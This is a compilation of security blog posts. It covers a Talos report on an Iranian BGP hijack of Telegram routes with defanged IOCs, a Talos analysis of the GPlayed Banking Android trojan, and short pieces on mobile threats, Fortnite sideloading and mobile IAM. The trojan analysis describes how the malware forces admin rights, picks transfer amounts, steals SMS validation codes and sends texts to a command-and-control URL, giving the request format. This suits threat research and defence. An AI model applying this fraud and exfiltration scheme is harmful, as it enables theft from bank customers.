While monitoring BGPStream, Cisco's database of Border Gateway Protocol (BGP) announcement, Talos noticed some routing anomalies originating from an Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in Request for Comments (RFC) 4271, as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows for internet communications to occur when requesting a resource located outside of the requested network or autonomous system.

BGP is used across the internet to assist with the selection of the best path routing. It's important to note this can be manipulated at ISP levels depending on various factors, which BGP allows for route selection. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:

The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.

These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."

While this was designed as a feature to combat networking issues, there was no adequate security mechanism added to prevent it from being abused. BGP offers no mechanism for security other than some methods like MD5 passwords for neighbours, IPSec or GTSM. None of these are default requirements and as such are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route. 

This could result in some traffic passing through a predetermined, or sub-optimal route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. BGP hijacking sessions' effectiveness are measured based on the number of BGP peers who receive the update through messages. The more peers who receive the update message, the more likely traffic is being routed through the alternative sub-optimal path, that is pre-configured by the actor.

Pre-Planned Routing Activity from ASN 58224


One interesting BGP routing anomaly occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iranian-based ASN 58224 announced an update for the prefix 185.112.156.0/22. The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.

This range potentially being hijacked was associated with Hungarian-based internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted for two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, this could have been a trial run for a larger BGP hijack attempt.


There were more significant BGP anomalies that originated from that same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as being "more specific" at the exact same time, down to the second, impacting communications with Telegram. When routers received this update message through the speaking system, they began routing some traffic destined to the Telegram servers through the ASN 58224. This campaign proved to be particularly effective, since a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.

How BGP Hijacking could have enabled computer network operations


Theoretically, this announcement could have one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram messages being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as documented by other security researchers, two months prior in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. There has been open-source reporting that suggests that Iran- based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with Telegram SMS verification codes needed to gain access to Telegram accounts.

This particular capability would be attractive, since it could allow the actors to route traffic in neighboring ASNs through Iran. This could allow the threat actors to gain access to devices in nearby countries and compromise users who utilized non-Iranian telecommunications providers.

The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it will be investigated. Nothing further has been publicly released regarding this investigation from the Iranian government.

Conclusions


The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. But we found that there are several Telegram clones with several thousands installations that somehow contact IP addresses located in Iran, some of them that advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users' devices.

The long-lasting activity of groups like Charming Kitten, even while using classic phishing techniques, are still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was the citizenship, it is understandable that the vast majority of any country's population won't be as cybersecurity educated as a cybersecurity professional, so even this classic technique could be highly effective.

While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assess with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time, to route two different Telegram ranges through four different subnets all associated with one ASN: 58224. This assessment statement also considers open-source reporting on Iran's complicated history with Telegram from passing laws banning the use of Telegram, to reports of outages resulting from Telegram's IP addresses being blocked in Iran.

Aside from the victims and the applications, Talos was unable to find any solid link between each of these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, being with or without state sponsorship. Talos assesses with high confidence that the users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.

IOC

Domains

talagram[.]ir
hotgram[.]ir
Harsobh[.]com
ndrm[.]ir
andromedaa[.]ir
buycomment[.]ir
bazdiddarbazdid[.]com
youpo[.]st
im9[.]ir
followerbegir[.]ir
buylike[.]ir
buyfollower[.]ir
andromedaa[.]ir
30dn[.]ir
ndrm[.]ir
followerbeg[.]ir
viewmember[.]ir
ozvdarozv[.]ir
ozvbegir[.]ir
obgr[.]ir
likebeg[.]ir
lbgr[.]ir
followgir[.]ir
followbegir[.]ir
fbgr[.]ir
commentbegir[.]ir
cbgr[.]ir
likebegir[.]com
commentbegir[.]com
andromedaa[.]com
ozvbegir[.]com
ozvdarozv[.]com
andromedaa[.]net
lik3[.]org
homayoon[.]info
buylike[.]in
lkbgr[.]com
flbgr[.]com
andromedaa[.]com
mobilecontinue[.]network
mobilecontinue[.]network
mobile-messengerplus[.]network
confirm-identification[.]name
invitation-to-messenger[.]space
com-messengersaccount[.]name
broadcastnews[.]pro
youridentityactivity[.]world
confirm-verification-process[.]systems
sessions-identifier-memberemailid[.]network
mail-profile[.]com
download-drive-share[.]ga
hangouts-talk[.]ga
mail-login-profile[.]com
watch-youtube[.]live
stratup-monitor[.]com
Xn--oogle-v1a[.]ga (ġoogle[.]ga)
file-share[.]ga

Hash values

8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram
24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram
a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d followerbegir.ipa
a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 ozvdarozv.apk

GPlayed’s younger brother is a banker — and it’s after Russian banks

This blog post is authored by Vitor Ventura.

Introduction


Cisco Talos published its findings on a new Android trojan known as "GPlayed" on Oct. 11. At the time, we wrote that the trojan seemed to be in the testing stages of development, based on the malware's code patterns, strings and telemetry visibility. Since then, we discovered that there's already a predecessor to GPlayed, which we are calling "GPlayed Banking." Unlike the first version of GPlayed, this is not an all-encompassing banking trojan. It is specifically a banking trojan that's looking to target Sberbank AutoPay users, a service offered by the Russian state-owned bank.

GPlayed Banking is spread in a similar way to the original GPlayed. It's disguised as a fake Google app store, but actually installs the malware once it's launched. This further illustrates the point that Android users need to be educated on how to spot a malicious app, and that they should be careful as to what privileges they assign to certain programs.
The malicious application is on the left-hand side.

Trojan architecture and capabilities


This malware is written in .NET using the GPlayed environment for mobile applications. The malware code is implemented in a DLL called "PlayMarket.dll."
GPlayed Banking issues its package certificate under a fake name that's not related to the application's name, nor the package's name.
Certificate information

The Android package is named "lola.catgirl." The application uses the label "Play Google Market," with an icon designed to look like the legitimate Google app store, and its name is "android.app.Application."

Package permissions

The trojan declares numerous permissions in the manifest, from which we wish to highlight the BIND_DEVICE_ADMIN, which provides nearly full control of the device to the trojan.
The working capabilities of this trojan are limited to the ones needed to perform its objective as a banking trojan. The only exception is that it also contains the ability to exfiltrate all of the user's received SMS messages to the command and control (C2).

Trojan details


Once executed, the trojan will start to obtain administrator privileges on the device by requesting that the user change its settings.
Privilege escalation requests

If the user cancels the device's administration request, the request dialog will appear again after five seconds repeatedly until the user finally gives it administrator privileges. The malware contains code that could lock the device's screen, but it's never called. The same happens with another feature that needs the device's administrator privilege.
Unused code

Notably, in order to perform its activities as a banking trojan, none of these privileges are needed.

In the next step in its initialization process, the trojan will create a timer with a random value that will range between 900 and 1,800 seconds. When triggered, this timer will start a WebView that is loaded from the URL hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html. This WebView will inject an amount of 500, which given the victim's profile, it is safe to assume that there will be rubbles.

The overlay will completely cover the screen which, depending on the device, can make the mobile device unusable until reboot or the WebView is closed. The WebView code couldn't be determined because the C2 was never online during the investigation.
WebView blocking device

This WebView overlay technique is the same used by the GPlayed trojan, from the same family. However, GPlayed trojan loaded the WebView from local resources contained in the application package. In that case, the webview would request the user's credit card information to pay for supposed "Google Services." Given the similarities, it is safe to assume that this WebView would have same sort of objective. This change from having the WebView code hosted in the C2 or having it as a resource on the package shows that the authors want to remain independent from the C2.

After the malware creates the WebView, it sends an SMS to the Sberbank AutoPay (+79262000900) service with the word "баланс," which means "balance" in Russian. Upon receiving an answer, the trojan will parse it to determine the account balance. If it is lower than 3,000, the trojan won't do anything. If it is larger than 68,000 the trojan requests a value of 66,000, otherwise it will request the available amount minus 1,000.
Balance checking and amount decision

Finally, with the available amount determined, the trojan will create a new WebView object and request the amount defined according to the rules previously shown.

Password extraction code

In order to complete financial transactions, a validation code is necessary. So, the following action is the registration of an SMS handler that will parse any arriving SMS messages and look for the word "пароль," which means "password" in Russian. The malware parses the SMS containing that word to extract the password, which will then be injected into the previously created WebView. We believe this malware is specifically designed to evade the 3-D Secure anti-fraud mechanism because it injects a variable called "s3dscode" with the extracted value to the WebView object. The password is actually the validation code needed to validate the transaction.
The SMS receiver handler, beside parsing the 3-D secure validation code, will also send all SMSs to the C2.
SMS exfiltration code

The SMSs are exfiltrated using a simple GET request to the REST-based URL hxxp://sub1[.]tdsworker[.]ru:5555/sms/", the format for this request is as follows:

<URL><device id>/<sender address>/<message content>

Trojan activity


This trojan hasn't been observed in the wild yet, and it's not being detected by many antivirus programs at the time of this writing. However, the samples were submitted for detection analysis in nearly the same week as when Talos discovered the malware. Just like in the GPlayed trojan case, the ratio detection verification method was the same. First, the package was submitted followed by the DLL that holds the code. In the case of the DLL, GPlayed and this sample share one of the submission sources, further strengthening the link between the two. Given the architecture, organization and maturity of the code, the most likely relation is that this banking trojan was created based on an early version of the GPlayed trojan code base, by the same author(s) given that they also share a C2.
Code comparison (above banking trojan, below, the original GPlayed trojan)

Just like GPlayed, the C2 was never online during our research, but it would be easy to adapt this trojan to a new C2. Therefore, we don't know what was displayed in the WebView step mentioned previously. The icon file used by both malware families is the same, which can be considered another link between the packages.

Conclusion


This trojan was designed with a very specific group of victims in mind, namely Sberbank customers who use the AutoPay service. However, adapting it to fit other banks would be a trivial activity for the developers of the GPlayed malware family.

This malware family is just another example of why mobile users need to be critical about the permissions they accept to certain apps. There's no specific exploit that GPlayed family uses to infect its victims — it can be installed on a device just through a simple spam campaign. Android users need to be aware of two important points: By installing applications from untrusted application stores, they are putting themselves and their data in jeopardy. Also, giving the wrong permissions can make a difference between a malware and a legitimate app. Users cannot trust permissions justifications, as they are provided by the developer, they must be critic about the permissions and assign them on a case by case.

The interception of SMS validation codes technique is not new for banking trojans. But this banking trojan followed by the GPlayed trojan shows a clear evolution of the actors behind this malware families. They went from a simple banking trojan to a full-fledged trojan with capabilities never seen before.

The DLLs used in the malware, which hold the majority of the code, have a low detection ratio and show that anti-virus solutions are not looking at the code in a file and are more so focused on Android packages' permissions and resources. While we have not yet seen these files in the wild, they certainly have the potential to infect a large number of users and could quickly hijack a user's banking credentials.

Coverage


Additional ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)

URLs

hxxp://sub1[.]tdsworker[.]ru:5555/sms/
hxxp://sub1[.]tdsworker[.]ru:6565/index_main.html

Hashes

Package.apk - 81d4f6796509a998122817aaa34e1c8c6de738e1fff5146009c07be8493f162c
PlayMarket.dll - 3c82d98f63e5894f53a5d2aa06713e9212269f5f55dcb30d78139ae9da21e212

Mobile Menace Monday: top five scariest mobile threats

In the spirit of this upcoming Halloween season, we thought we’d provide you with a list of the top five scariest mobile threats in our book.

The list is organized from least to most haunting, based on my own humble opinion gathered from several years as a mobile threat researcher. Of course, my opinion has also been formed by the data we’ve collected within the last few months that shows which threats have been terrorizing customers the most. Without further ado, these are the top threats that haunt my dreams.

5) The clinking of locks and chains

Although not the most prevalent mobile malware (thank goodness), mobile ransomware’s nastiness will give you the chills. It starts by tricking users into giving away their device administrator rights.  Afterwards, the ransomware offers a treat of locking the device from any use unless you pay a ransom.

Even scarier, some mobile ransomware threatens prosecution by law enforcement, claiming illegal activities have been conducted on the device. This is all a hoax, as law enforcement would never request paying a fine through payment methods like Bitcoin or gift cards. The most popular mobile ransomware family is detected by Malwarebytes as Android/Ransom.SLocker.

4) Guerrilla warfare

As a mobile researcher, it sometimes feels like a war out there. This is especially true with the mobile malware Android/Trojan.Guerrilla. Guerrilla warfare can be described as irregular, which sums up this Guerrilla’s tactics of obfuscating malware scanners. Infections usually come with multiple variants of Guerrilla running on the device. However, for every move they make, we have a counter move. The war is never-ending.

 

3) Dashing from ghosts?  No, to the top of detections list!

Android/Adware.MobiDash will make your skin crawl! It’s one most highly-detected threats we’ve seen on customers’ Android devices! As if possessed, MobiDash goes above and beyond the typical low-level adware. It starts by sneaking its way into getting device administration rights.  Once given, the user will be doomed with ads on his lock screen.

Good luck uninstalling, as some versions are especially good at hiding themselves in plain sight!

2) Lurking in the shadows…of code!

Another high-ranking threat found on customer’s Android devices, Android/Trojan.HiddenAds, is a smooth criminal. Also known as Android/Trojan.Hiddad, its haunting ability to effectively hide its malicious code is terrifying! In fact, it often bypasses Google Play Protect‘s verification system.  Thus, apps infected with HiddenAds make it onto the Play Store. After installing on a device, periodic full-screen ads will haunt you!

1) The one that keeps me up at night: Adups

Seriously, I have lost sleep over this one. Adups and I have a long history:

Mobile Menace Monday: Adups, old and new

Mobile Menace Monday: upping the ante on Adups

Adups comes in many forms, but the most prevalent is Android/PUP.Riskware.Autoins.Fota. This variant can potentially auto install malware like Android/Trojan.Guerrilla, and Android/Trojan.HiddenAds. As addressed in the blogs linked above, it’s a preinstalled system app(s). Thus, it cannot be uninstalled through the device’s information page, only disabled.  However, the nightmare gets worse—Adups can’t even be disabled. Not even a mobile scanner can remove or disable it.

So how do we deal with this Freddy Krueger of a mobile threat? Well, you’re going to have to defeat it in a different realm: the realm of ADB command line tools, a part of Google’s Android Studio. Luckily, we found a wake to wake up from the nightmare, as we recently updated a guide on how to fully uninstall (not just disable) Adups. Beware, though, this tutorial is not for the faint of heart, and only recommended for advanced users.

Safe room

When the boogie men of mobile threats try to break through the walls, we have a safe room for you: Malwarebytes for Android keeps the scariest mobile threats at bay! Stay safe out there!

The post Mobile Menace Monday: top five scariest mobile threats appeared first on Malwarebytes Labs.

Stolen Apple IDs reportedly used for mobile payment theft in China

Users of two major mobile payment services in China -- Alipay and WeChat Pay -- have reported unauthorized Apple App Store spending in recent days, with some losing nearly $300 through fraudulent transactions. The companies say that stolen Apple IDs are to blame, the Wall Street Journal reports, and Alipay has asked Apple to investigate. In the meantime, Alipay is telling its customers to minimize potential losses by reducing how much money can be used from their accounts without a password.

Via: 9to5Mac

Fortnite: When Dollars and Cents Trumps Security!

When Epic Games recently announced and subsequently released Fortnite for Android, it took the decision to bypass the Play Store and ask users to side-load the app. After I read that Epic Games’ brilliant idea was to ask Android users to essentially downgrade the security on their devices, there was a lot of head-on-desk action.

Side-loading an app onto an Android device is essentially asking the user to download it from a website instead of the Play Store and then ignore the Android warnings about installing apps from untrusted locations. In more recent Android versions this safety net is called “Install unknown apps” and when a user tries to install an app directly from a website, the operating system will ask them a few times if they really want to do this. Note that this is does not affect users on Apple iOS devices as Apple locks down app distribution to the App Store.

Don’t get me wrong, I understand both the business reason and the developer logic that drove Epic Games to release the Android version in this way. For developers, Android’s lack of homogeneity means they often have to validate their app across multiple stores, each with its own constraints and minimum requirements. Thus, what should be a simple app release can gain an Nth degree of complexity; increased time to develop and associated maintenance, leading to increased cost. This is not an attractive prospect for any vendor wanting to deliver a product. Added to the fact that the Play Store takes a 30% cut on all transactions, you can see why an app vendor would look to avoid this if they could! Let’s face it, gaming companies have to make money in order to recuperate the investment in the development and maintenance of the game.

You may be reading this wondering why incentivising users to side-load popular games is really a problem. Fundamentally, it introduces bad habits to users. These bad habits break down the general foundations of mobile device security. The Fortnite game has a huge following and we can’t neglect the message being sent not only to users but also other app developers.

In InfoSec, we constantly argue the benefits of teaching users about safe and secure principals when using electronic devices, browsing the web and installing applications. The Epic Games Android installation is the antithesis of these teachings, instead sending a clear message to users – especially a younger generation that will one day enter the workforce – that it is ok to install apps from any location.

The fact is, Epic Games is inadvertently making  it easier for a malicious party to trick users into downloading fake apps and providing an opportunity for these malicious parties to introduce fake apps in the official store. This has been seen before, especially in the banking industry, and was even the case for Fortnite itself during the beta period. Google Pay Protect is one element of sanity in this situation as it will scan the apps on the device. Unfortunately this is only a recent addition to Android and is not always available depending on the version or the manufacturer of the device.

The issues continue even after the app is installed and being used. Fortnite, like many games, is free to play but relies extensively on in-app purchases – the pay to win paradigm. By not using the Play Store to deliver the app originally, the vendor needs to set-up its own payment infrastructure and ensure it is safe. This in itself is not an easy task and can be thwart with errors and potential for data loss.

Stepping back and analysing the situation, where does one place blame? I think a majority of us in the industry, myself included, will scorn the vendor for not doing the right thing and promoting bad habits to users. Looking beyond the initial rapid shame response from the industry, I think it is interesting to put oneself in the vendor’s shoes. I can see how the lack of standardisation, draconian process and exorbitant fees would make it unattractive to go to market via the various app stores in the “proper way”. Perhaps it is time for companies like Apple and Google to rethink the app distribution model, so all can benefit from a secure platform?

Realistically, I believe that this situation just boils down to the ability for a business to make a profit and you know what, this isn’t the first time or place where security has been compromised or downgraded because of money. Let’s face it, we see it all the time – most recently in IoT security and more generally in corporate security when a security risk is accepted instead of investing time and funds in fixing it.

This is why we can’t have secure things!

Update: Seems like fake Fortnite apps are already in the wild, more here

Thanks to Hannah Finch for the editorial review

The post Fortnite: When Dollars and Cents Trumps Security! appeared first on Liquidmatrix Security Digest.

The Evolution of Mobile Security

Today, I posted a blog entry to the Oracle Identity Management blog titled Analyzing How MDM and MAM Stack Up Against Your Mobile Security Requirements. In the post, I walk through a quick history of mobile security starting with MDM, evolving into MAM, and providing a glimpse into the next generation of mobile security where access is managed and governed along with everything else in the enterprise. It should be no surprise that's where we're heading but as always I welcome your feedback if you disagree.

Here's a brief excerpt:
Mobile is the new black. Every major analyst group seems to have a different phrase for it but we all know that workforces are increasingly mobile and BYOD (Bring Your Own Device) is quickly spreading as the new standard. As the mobile access landscape changes and organizations continue to lose more and more control over how and where information is used, there is also a seismic shift taking place in the underlying mobile security models.
Mobile Device Management (MDM) was a great first response by an Information Security industry caught on its heels by the overwhelming speed of mobile device adoption. Emerging at a time when organizations were purchasing and distributing devices to employees, MDM provided a mechanism to manage those devices, ensure that rogue devices weren’t being introduced onto the network, and enforce security policies on those devices. But MDM was as intrusive to end-users as it was effective for enterprises.
Continue Reading

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see. OS Updates and Security Patches are slow to arrive and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are on whatever device they're using. So, the challenge is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with Blackberry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate for mobile device use-cases. There's no reason to have to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate for provisioning mobile apps and data rights just like they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said, for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. There have even been a number of niche vendors pop-up that provide that as their primary value proposition. But, the core technologies for these stand-alone solutions is nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. But there's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.)

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up a IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.

Is MAM Identity and Access Management’s next big thing?

Mobile Application Management is making waves. Recent news from Oracle, IBM, and Salesforce highlight the market interest. It's a natural extension of what you've been hearing at Identity trade shows over the past few years (and this year's Gartner IAM Summit was no exception). The third platform of computing is not a future state. It's here. And Identity and Access solutions are adapting to accommodate the new use case scenarios. ...onward and upward.

[Update - interesting discussion of the IAM technology stack for mobile by SIMIEO]